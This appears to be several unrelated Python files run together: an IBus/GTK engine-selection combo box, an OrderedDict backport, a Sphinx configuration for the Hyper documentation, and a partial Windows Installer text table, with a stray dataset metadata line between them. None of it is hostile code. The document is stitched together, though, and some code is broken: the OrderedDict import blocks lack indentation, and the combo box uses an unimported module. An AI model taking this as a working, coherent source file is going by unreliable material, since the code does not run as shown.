from gi.repository import GObject
from gi.repository import Gtk
from gi.repository import IBus
from gi.repository import Pango
from icon import load_icon
from i18n import _, N_
class EngineComboBox(Gtk.ComboBox):
    """Combo box listing IBus input-method engines grouped by language.

    Row model: a one-column Gtk.TreeStore holding either an int (the
    "Select an input method" placeholder), a str/unicode language name
    (group header), or an IBus.EngineDesc (selectable engine).

    NOTE(review): this file is Python 2 (``unicode``, ``raise E, msg``,
    ``list.sort(cmp)``).
    """
    __gtype_name__ = 'EngineComboBox'
    __gproperties__ = {
        'active-engine' : (
            object,
            'selected engine',
            'selected engine',
            GObject.ParamFlags.READABLE)
    }

    def __init__(self):
        super(EngineComboBox, self).__init__()
        # Re-emit "notify::active" as "notify::active-engine".
        self.connect("notify::active", self.__notify_active_cb)

        self.__model = None

        # First cell: the engine icon.
        renderer = Gtk.CellRendererPixbuf()
        renderer.set_property("xalign", 0)
        renderer.set_property("xpad", 2)
        self.pack_start(renderer, False)
        self.set_cell_data_func(renderer, self.__icon_cell_data_cb, None)

        # Second cell: the engine / language name.
        renderer = Gtk.CellRendererText()
        renderer.set_property("xalign", 0)
        renderer.set_property("xpad", 2)
        self.pack_start(renderer, True)
        self.set_cell_data_func(renderer, self.__name_cell_data_cb, None)

    def set_engines(self, engines):
        """Populate the model from *engines* (IBus.EngineDesc list).

        Engines are grouped under their language name; the current locale's
        language is moved to the top and "Other" to the bottom. Within a
        group engines are ordered by descending rank, then by long name.
        """
        self.__model = Gtk.TreeStore(object)

        # Placeholder row (int 0) for "Select an input method".
        iter1 = self.__model.append(None)
        self.__model.set(iter1, 0, 0)

        # Bucket engines by localized language name.
        langs = {}
        for e in engines:
            l = IBus.get_language_name(e.get_language())
            if l == None:
                l = ""
            if l not in langs:
                langs[l] = []
            langs[l].append(e)

        keys = langs.keys()
        keys.sort(locale.strcoll)

        loc = locale.getlocale()[0]
        # None on C locale
        if loc == None:
            loc = 'en_US'
        current_lang = IBus.get_language_name(loc)
        # move current language to the first place
        if current_lang in keys:
            keys.remove(current_lang)
            keys.insert(0, current_lang)

        #add "Others" to the end of the combo box
        if IBus.get_language_name("Other") in keys:
            keys.remove(IBus.get_language_name("Other"))
            keys += [IBus.get_language_name("Other")]

        for l in keys:
            iter1 = self.__model.append(None)
            self.__model.set(iter1, 0, l)
            def cmp_engine(a, b):
                # Higher rank first; tie-break by locale-aware long name.
                if a.get_rank() == b.get_rank():
                    return locale.strcoll(a.get_longname(), b.get_longname())
                return int(b.get_rank() - a.get_rank())
            langs[l].sort(cmp_engine)
            for e in langs[l]:
                iter2 = self.__model.append(iter1)
                self.__model.set(iter2, 0, e)

        self.set_model(self.__model)
        self.set_active(0)

    def __icon_cell_data_cb(self, celllayout, renderer, model, iter, data):
        # Show the icon only for real engine rows, not headers/placeholder.
        engine = self.__model.get_value(iter, 0)

        if isinstance(engine, str) or isinstance (engine, unicode):
            renderer.set_property("visible", False)
            renderer.set_property("sensitive", False)
        elif isinstance(engine, int):
            renderer.set_property("visible", False)
            renderer.set_property("sensitive", False)
        else:
            renderer.set_property("visible", True)
            renderer.set_property("sensitive", True)
            pixbuf = load_icon(engine.get_icon(), Gtk.IconSize.LARGE_TOOLBAR)
            renderer.set_property("pixbuf", pixbuf)

    def __name_cell_data_cb(self, celllayout, renderer, model, iter, data):
        # Render headers greyed out, the placeholder prompt, or the engine
        # long name (bold for explicitly ranked engines).
        engine = self.__model.get_value(iter, 0)

        if isinstance (engine, str) or isinstance (engine, unicode):
            renderer.set_property("sensitive", False)
            renderer.set_property("text", engine)
            renderer.set_property("weight", Pango.Weight.NORMAL)
        elif isinstance(engine, int):
            renderer.set_property("sensitive", True)
            renderer.set_property("text", _("Select an input method"))
            renderer.set_property("weight", Pango.Weight.NORMAL)
        else:
            renderer.set_property("sensitive", True)
            renderer.set_property("text", engine.get_longname())
            renderer.set_property("weight",
                Pango.Weight.BOLD if engine.get_rank() > 0 else Pango.Weight.NORMAL)

    def __notify_active_cb(self, combobox, property):
        # Forward the underlying "active" change to our derived property.
        self.notify("active-engine")

    def do_get_property(self, property):
        if property.name == "active-engine":
            i = self.get_active()
            # Row 0 is the placeholder; -1 means nothing selected.
            if i == 0 or i == -1:
                return None
            iter = self.get_active_iter()
            return self.get_model()[iter][0]
        else:
            raise AttributeError, 'unknown property %s' % property.name

    def get_active_engine(self):
        """Return the selected IBus.EngineDesc, or None."""
        return self.get_property("active-engine")
if __name__ == "__main__":
    # Minimal manual test: show the combo box with a single engine.
    engine_combo = EngineComboBox()
    engine_combo.set_engines([IBus.EngineDesc(language="zh")])
    window = Gtk.Window()
    window.add(engine_combo)
    window.show_all()
    Gtk.main()
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
    'Dictionary that remembers insertion order'
    # An inherited dict maps keys to values.
    # The inherited dict provides __getitem__, __len__, __contains__, and get.
    # The remaining methods are order-aware.
    # Big-O running times for all methods are the same as for regular dictionaries.

    # The internal self.__map dictionary maps keys to links in a doubly linked list.
    # The circular doubly linked list starts and ends with a sentinel element.
    # The sentinel element never gets deleted (this simplifies the algorithm).
    # Each link is stored as a list of length three:  [PREV, NEXT, KEY].

    def __init__(self, *args, **kwds):
        '''Initialize an ordered dictionary.  Signature is the same as for
        regular dictionaries, but keyword arguments are not recommended
        because their insertion order is arbitrary.

        '''
        if len(args) > 1:
            raise TypeError('expected at most 1 arguments, got %d' % len(args))
        try:
            # Re-initialization of an existing instance keeps its sentinel.
            self.__root
        except AttributeError:
            self.__root = root = []                     # sentinel node
            root[:] = [root, root, None]
            self.__map = {}
        self.__update(*args, **kwds)

    def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
        'od.__setitem__(i, y) <==> od[i]=y'
        # Setting a new item creates a new link which goes at the end of the linked
        # list, and the inherited dictionary is updated with the new key/value pair.
        if key not in self:
            root = self.__root
            last = root[0]
            last[1] = root[0] = self.__map[key] = [last, root, key]
        dict_setitem(self, key, value)

    def __delitem__(self, key, dict_delitem=dict.__delitem__):
        'od.__delitem__(y) <==> del od[y]'
        # Deleting an existing item uses self.__map to find the link which is
        # then removed by updating the links in the predecessor and successor nodes.
        dict_delitem(self, key)
        link_prev, link_next, key = self.__map.pop(key)
        link_prev[1] = link_next
        link_next[0] = link_prev

    def __iter__(self):
        'od.__iter__() <==> iter(od)'
        # Walk the linked list forward from the sentinel.
        root = self.__root
        curr = root[1]
        while curr is not root:
            yield curr[2]
            curr = curr[1]

    def __reversed__(self):
        'od.__reversed__() <==> reversed(od)'
        # Walk the linked list backward from the sentinel.
        root = self.__root
        curr = root[0]
        while curr is not root:
            yield curr[2]
            curr = curr[0]

    def clear(self):
        'od.clear() -> None.  Remove all items from od.'
        try:
            # Break reference cycles by emptying every link node.
            # (AttributeError is caught for instances whose __init__ never
            # ran, so __map/__root do not exist yet.)
            for node in self.__map.itervalues():
                del node[:]
            root = self.__root
            root[:] = [root, root, None]
            self.__map.clear()
        except AttributeError:
            pass
        dict.clear(self)

    def popitem(self, last=True):
        '''od.popitem() -> (k, v), return and remove a (key, value) pair.
        Pairs are returned in LIFO order if last is true or FIFO order if false.

        '''
        if not self:
            raise KeyError('dictionary is empty')
        root = self.__root
        if last:
            # Unlink the node just before the sentinel (most recent).
            link = root[0]
            link_prev = link[0]
            link_prev[1] = root
            root[0] = link_prev
        else:
            # Unlink the node just after the sentinel (oldest).
            link = root[1]
            link_next = link[1]
            root[1] = link_next
            link_next[0] = root
        key = link[2]
        del self.__map[key]
        value = dict.pop(self, key)
        return key, value

    # -- the following methods do not depend on the internal structure --

    def keys(self):
        'od.keys() -> list of keys in od'
        return list(self)

    def values(self):
        'od.values() -> list of values in od'
        return [self[key] for key in self]

    def items(self):
        'od.items() -> list of (key, value) pairs in od'
        return [(key, self[key]) for key in self]

    def iterkeys(self):
        'od.iterkeys() -> an iterator over the keys in od'
        return iter(self)

    def itervalues(self):
        'od.itervalues -> an iterator over the values in od'
        for k in self:
            yield self[k]

    def iteritems(self):
        'od.iteritems -> an iterator over the (key, value) items in od'
        for k in self:
            yield (k, self[k])

    def update(*args, **kwds):
        '''od.update(E, **F) -> None.  Update od from dict/iterable E and F.

        If E is a dict instance, does:           for k in E: od[k] = E[k]
        If E has a .keys() method, does:         for k in E.keys(): od[k] = E[k]
        Or if E is an iterable of items, does:   for k, v in E: od[k] = v
        In either case, this is followed by:     for k, v in F.items(): od[k] = v

        '''
        # 'self' is taken positionally so a key named "self" may appear in kwds.
        if len(args) > 2:
            raise TypeError('update() takes at most 2 positional '
                            'arguments (%d given)' % (len(args),))
        elif not args:
            raise TypeError('update() takes at least 1 argument (0 given)')
        self = args[0]
        # Make progressively weaker assumptions about "other"
        other = ()
        if len(args) == 2:
            other = args[1]
        if isinstance(other, dict):
            for key in other:
                self[key] = other[key]
        elif hasattr(other, 'keys'):
            for key in other.keys():
                self[key] = other[key]
        else:
            for key, value in other:
                self[key] = value
        for key, value in kwds.items():
            self[key] = value

    __update = update  # let subclasses override update without breaking __init__

    __marker = object()

    def pop(self, key, default=__marker):
        '''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
        If key is not found, d is returned if given, otherwise KeyError is raised.

        '''
        if key in self:
            result = self[key]
            del self[key]
            return result
        if default is self.__marker:
            raise KeyError(key)
        return default

    def setdefault(self, key, default=None):
        'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
        if key in self:
            return self[key]
        self[key] = default
        return default

    def __repr__(self, _repr_running={}):
        'od.__repr__() <==> repr(od)'
        # _repr_running guards against infinite recursion on self-referencing
        # dictionaries (keyed by object id and thread id).
        call_key = id(self), _get_ident()
        if call_key in _repr_running:
            return '...'
        _repr_running[call_key] = 1
        try:
            if not self:
                return '%s()' % (self.__class__.__name__,)
            return '%s(%r)' % (self.__class__.__name__, self.items())
        finally:
            del _repr_running[call_key]

    def __reduce__(self):
        'Return state information for pickling'
        items = [[k, self[k]] for k in self]
        inst_dict = vars(self).copy()
        # Strip the implementation attributes (__root/__map) from the state.
        for k in vars(OrderedDict()):
            inst_dict.pop(k, None)
        if inst_dict:
            return (self.__class__, (items,), inst_dict)
        return self.__class__, (items,)

    def copy(self):
        'od.copy() -> a shallow copy of od'
        return self.__class__(self)

    @classmethod
    def fromkeys(cls, iterable, value=None):
        '''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
        and values equal to v (which defaults to None).

        '''
        d = cls()
        for key in iterable:
            d[key] = value
        return d

    def __eq__(self, other):
        '''od.__eq__(y) <==> od==y.  Comparison to another OD is order-sensitive
        while comparison to a regular mapping is order-insensitive.

        '''
        if isinstance(other, OrderedDict):
            return len(self)==len(other) and self.items() == other.items()
        return dict.__eq__(self, other)

    def __ne__(self, other):
        return not self == other

    # -- the following methods are only used in Python 2.7 --

    def viewkeys(self):
        "od.viewkeys() -> a set-like object providing a view on od's keys"
        return KeysView(self)

    def viewvalues(self):
        "od.viewvalues() -> an object providing a view on od's values"
        return ValuesView(self)

    def viewitems(self):
        "od.viewitems() -> a set-like object providing a view on od's items"
        return ItemsView(self)
# -*- coding: utf-8 -*-
#
# Empear Enterprise Edition documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 23 16:50:32 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
import os
import subprocess
from datetime import date
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
def get_git_rev():
    """Return the abbreviated hash of the current git HEAD as text.

    The command output is decoded so the result is a native ``str`` on
    Python 3 — the previous ``Popen(...).stdout.read()`` returned raw
    ``bytes`` there (Sphinx would render the version as ``b'...'``) and
    never waited on the child process. Returns an empty string when git
    produces no output (e.g. outside a git checkout).
    """
    proc = subprocess.Popen("git rev-parse --short HEAD", shell=True,
                            stdout=subprocess.PIPE)
    # communicate() reads stdout to EOF and reaps the child (no zombie).
    out = proc.communicate()[0]
    return out.decode("ascii", "replace").strip()
def get_version():
    """Return the docs version: $VERSION when set, else the git revision."""
    # An empty VERSION counts as unset, exactly like the truthiness test
    # in the original implementation.
    return os.environ.get("VERSION") or get_git_rev()
version = get_version()
# The full version, including alpha/beta/rc tags.
release = version
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.todo',
]
# Automatically number figures, tables and code blocks (enables :numref:).
numfig = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Hyper'
# Copyright year range tracks the build date automatically.
copyright = u'2016-{0} Oskar Wickström'.format(date.today().year)
author = u'Oskar Wickström'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'xcode'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'theme' # use the theme in subdir 'theme'
html_theme_path = ['.'] # make sphinx search for themes in current dir
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
}
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
html_title = u'Hyper — Type-safe, statically checked composition of HTTP servers'
# A shorter title for the navigation bar. Default is the same as html_title.
#
html_short_title = u'Hyper'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = 'logo.png'
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
html_favicon = 'favicon.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
html_domain_indices = False
# If false, no index is generated.
#
html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
html_show_sourcelink = False
# If true, the reST sources are included in the HTML build as _sources/name. The
# default is True.
html_copy_source = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
html_use_opensearch = 'http://hyper.wickstrom.tech'
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Hyper'
# -- Options for LaTeX output ---------------------------------------------
latex_preamble = r'''
\usepackage{lmodern}
\usepackage[T1]{fontenc}
%
\usepackage{fancyhdr}
\fancypagestyle{plain}{%
\renewcommand{\headrulewidth}{0pt}%
\fancyhf{}%
\fancyfoot[C]{\textsf{\thepage}}
}
\pagestyle{fancy}
\fancyhf{}
\fancyhead[C]{\textsf{\bfseries{\leftmark}}}
\fancyfoot[C]{\textsf{\thepage}}
\renewcommand{\footrulewidth}{0pt}
\renewcommand{\headrulewidth}{0pt}
%
\usepackage[font={small,it}]{caption}
\titleformat{\chapter}[display]
{\normalfont\sffamily\huge\bfseries\color{black}}
{\chaptertitlename\ \thechapter}{20pt}{\Huge}
\titleformat{\section}
{\normalfont\sffamily\normalsize\bfseries\color{black}}
{\thesection}{1em}{}
\titleformat{\subsection}
{\normalfont\sffamily\normalsize\bfseries\color{black}}
{\thesubsection}{1em}{}
\titleformat{\subsubsection}
{\normalfont\sffamily\normalsize\bfseries\color{black}}
{\thesubsubsection}{1em}{}
\titleformat{\paragraph}{\normalfont\normalsize\slshape}{\theparagraph}{1em}{}
% \hypersetup{colorlinks = false}
%
\usepackage{enumitem}
\setlist[description]{style=nextline}
\renewcommand{\descriptionlabel}[1]{\hspace{\labelsep}\emph{#1}}
'''
latex_title_page = r'''
\begin{titlepage}
\vspace*{\fill}
\begin{center}
\includegraphics[width=0.5\textwidth]{_static/hyper@2x.png}\par
\vspace{1cm}
{\Large\text{Type-safe, statically checked composition of HTTP servers}\par}
\vspace{2cm}
{\Large\version\par}
\vspace{2cm}
{\Large\itshape \today\par}
\end{center}
\vspace*{\fill}
\end{titlepage}
'''
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    'papersize': 'a4paper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    'preamble': latex_preamble,
    # Latex figure (float) alignment
    #
    #'figure_align': 'htbp',
    # Empty strings disable Sphinx's default font package and fancy chapter
    # styling; the custom preamble above supplies its own title formatting.
    'fontpkg': '',
    'fncychap': '',
    'releasename': 'Version',
    # Drop the frame Sphinx normally draws around verbatim blocks.
    'sphinxsetup': 'verbatimwithframe=false',
    # Custom title page (defined in latex_title_page above).
    'maketitle': latex_title_page,
}
latex_show_pagerefs = True
latex_show_url = 'footnote'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'hyper.tex', u'Hyper Documentation',
     u'Oskar Wickström', 'report'),  # 'report' class: \chapter-level sectioning
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'Hyper', u'Hyper Documentation',
     [author], 1)  # section 1: user commands
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'Hyper', u'Hyper Documentation',
     author, 'Hyper', 'Type-safe, statically checked composition of HTTP servers',
     'Web'),  # last field: dir-menu category
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
# epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#
# epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#
# epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#
# epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#
# epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#
# epub_tocdepth = 3
# Allow duplicate toc entries.
#
# epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#
# epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#
# epub_fix_images = False
# Scale large images.
#
# epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# epub_show_urls = 'inline'
# If false, no index is generated.
#
# epub_use_index = True | unknown | codeparrot/codeparrot-clean | ||
# Standard-library imports, one per line (PEP 8), and the directory of this
# module so table data can be located relative to it. The original line
# fused two imports and a statement with a semicolon.
import msilib
import os

dirname = os.path.dirname(__file__)
ActionText = [
('InstallValidate', 'Validating install', None),
('InstallFiles', 'Copying new files', 'File: [1], Directory: [9], Size: [6]'),
('InstallAdminPackage', 'Copying network install files', 'File: [1], Directory: [9], Size: [6]'),
('FileCost', 'Computing space requirements', None),
('CostInitialize', 'Computing space requirements', None),
('CostFinalize', 'Computing space requirements', None),
('CreateShortcuts', 'Creating shortcuts', 'Shortcut: [1]'),
('PublishComponents', 'Publishing Qualified Components', 'Component ID: [1], Qualifier: [2]'),
('PublishFeatures', 'Publishing Product Features', 'Feature: [1]'),
('PublishProduct', 'Publishing product information', None),
('RegisterClassInfo', 'Registering Class servers', 'Class Id: [1]'),
('RegisterExtensionInfo', 'Registering extension servers', 'Extension: [1]'),
('RegisterMIMEInfo', 'Registering MIME info', 'MIME Content Type: [1], Extension: [2]'),
('RegisterProgIdInfo', 'Registering program identifiers', 'ProgId: [1]'),
('AllocateRegistrySpace', 'Allocating registry space', 'Free space: [1]'),
('AppSearch', 'Searching for installed applications', 'Property: [1], Signature: [2]'),
('BindImage', 'Binding executables', 'File: [1]'),
('CCPSearch', 'Searching for qualifying products', None),
('CreateFolders', 'Creating folders', 'Folder: [1]'),
('DeleteServices', 'Deleting services', 'Service: [1]'),
('DuplicateFiles', 'Creating duplicate files', 'File: [1], Directory: [9], Size: [6]'),
('FindRelatedProducts', 'Searching for related applications', 'Found application: [1]'),
('InstallODBC', 'Installing ODBC components', None),
('InstallServices', 'Installing new services', 'Service: [2]'),
('LaunchConditions', 'Evaluating launch conditions', None),
('MigrateFeatureStates', 'Migrating feature states from related applications', 'Application: [1]'),
('MoveFiles', 'Moving files', 'File: [1], Directory: [9], Size: [6]'),
('PatchFiles', 'Patching files', 'File: [1], Directory: [2], Size: [3]'),
('ProcessComponents', 'Updating component registration', None),
('RegisterComPlus', 'Registering COM+ Applications and Components', 'AppId: [1]{{, AppType: [2], Users: [3], RSN: [4]}}'),
('RegisterFonts', 'Registering fonts', 'Font: [1]'),
('RegisterProduct', 'Registering product', '[1]'),
('RegisterTypeLibraries', 'Registering type libraries', 'LibID: [1]'),
('RegisterUser', 'Registering user', '[1]'),
('RemoveDuplicateFiles', 'Removing duplicated files', 'File: [1], Directory: [9]'),
('RemoveEnvironmentStrings', 'Updating environment strings', 'Name: [1], Value: [2], Action [3]'),
('RemoveExistingProducts', 'Removing applications', 'Application: [1], Command line: [2]'),
('RemoveFiles', 'Removing files', 'File: [1], Directory: [9]'),
('RemoveFolders', 'Removing folders', 'Folder: [1]'),
('RemoveIniValues', 'Removing INI files entries', 'File: [1], Section: [2], Key: [3], Value: [4]'),
('RemoveODBC', 'Removing ODBC components', None),
('RemoveRegistryValues', 'Removing system registry values', 'Key: [1], Name: [2]'),
('RemoveShortcuts', 'Removing shortcuts', 'Shortcut: [1]'),
('RMCCPSearch', 'Searching for qualifying products', None),
('SelfRegModules', 'Registering modules', 'File: [1], Folder: [2]'),
('SelfUnregModules', 'Unregistering modules', 'File: [1], Folder: [2]'),
('SetODBCFolders', 'Initializing ODBC directories', None),
('StartServices', 'Starting services', 'Service: [1]'),
('StopServices', 'Stopping services', 'Service: [1]'),
('UnpublishComponents', 'Unpublishing Qualified Components', 'Component ID: [1], Qualifier: [2]'),
('UnpublishFeatures', 'Unpublishing Product Features', 'Feature: [1]'),
('UnregisterClassInfo', 'Unregister Class servers', 'Class Id: [1]'),
('UnregisterComPlus', 'Unregistering COM+ Applications and Components', 'AppId: [1]{{, AppType: [2]}}'),
('UnregisterExtensionInfo', 'Unregistering extension servers', 'Extension: [1]'),
('UnregisterFonts', 'Unregistering fonts', 'Font: [1]'),
('UnregisterMIMEInfo', 'Unregistering MIME info', 'MIME Content Type: [1], Extension: [2]'),
('UnregisterProgIdInfo', 'Unregistering program identifiers', 'ProgId: [1]'),
('UnregisterTypeLibraries', 'Unregistering type libraries', 'LibID: [1]'),
('WriteEnvironmentStrings', 'Updating environment strings', 'Name: [1], Value: [2], Action [3]'),
('WriteIniValues', 'Writing INI files values', 'File: [1], Section: [2], Key: [3], Value: [4]'),
('WriteRegistryValues', 'Writing system registry values', 'Key: [1], Name: [2], Value: [3]'),
('Advertise', 'Advertising application', None),
('GenerateScript', 'Generating script operations for action:', '[1]'),
('InstallSFPCatalogFile', 'Installing system catalog', 'File: [1], Dependencies: [2]'),
('MsiPublishAssemblies', 'Publishing assembly information', 'Application Context:[1], Assembly Name:[2]'),
('MsiUnpublishAssemblies', 'Unpublishing assembly information', 'Application Context:[1], Assembly Name:[2]'),
('Rollback', 'Rolling back action:', '[1]'),
('RollbackCleanup', 'Removing backup files', 'File: [1]'),
('UnmoveFiles', 'Removing moved files', 'File: [1], Directory: [9]'),
('UnpublishProduct', 'Unpublishing product information', None),
]
UIText = [
('AbsentPath', None),
('bytes', 'bytes'),
('GB', 'GB'),
('KB', 'KB'),
('MB', 'MB'),
('MenuAbsent', 'Entire feature will be unavailable'),
('MenuAdvertise', 'Feature will be installed when required'),
('MenuAllCD', 'Entire feature will be installed to run from CD'),
('MenuAllLocal', 'Entire feature will be installed on local hard drive'),
('MenuAllNetwork', 'Entire feature will be installed to run from network'),
('MenuCD', 'Will be installed to run from CD'),
('MenuLocal', 'Will be installed on local hard drive'),
('MenuNetwork', 'Will be installed to run from network'),
('ScriptInProgress', 'Gathering required information...'),
('SelAbsentAbsent', 'This feature will remain uninstalled'),
('SelAbsentAdvertise', 'This feature will be set to be installed when required'),
('SelAbsentCD', 'This feature will be installed to run from CD'),
('SelAbsentLocal', 'This feature will be installed on the local hard drive'),
('SelAbsentNetwork', 'This feature will be installed to run from the network'),
('SelAdvertiseAbsent', 'This feature will become unavailable'),
('SelAdvertiseAdvertise', 'Will be installed when required'),
('SelAdvertiseCD', 'This feature will be available to run from CD'),
('SelAdvertiseLocal', 'This feature will be installed on your local hard drive'),
('SelAdvertiseNetwork', 'This feature will be available to run from the network'),
('SelCDAbsent', "This feature will be uninstalled completely, you won't be able to run it from CD"),
('SelCDAdvertise', 'This feature will change from run from CD state to set to be installed when required'),
('SelCDCD', 'This feature will remain to be run from CD'),
('SelCDLocal', 'This feature will change from run from CD state to be installed on the local hard drive'),
('SelChildCostNeg', 'This feature frees up [1] on your hard drive.'),
('SelChildCostPos', 'This feature requires [1] on your hard drive.'),
('SelCostPending', 'Compiling cost for this feature...'),
('SelLocalAbsent', 'This feature will be completely removed'),
('SelLocalAdvertise', 'This feature will be removed from your local hard drive, but will be set to be installed when required'),
('SelLocalCD', 'This feature will be removed from your local hard drive, but will be still available to run from CD'),
('SelLocalLocal', 'This feature will remain on you local hard drive'),
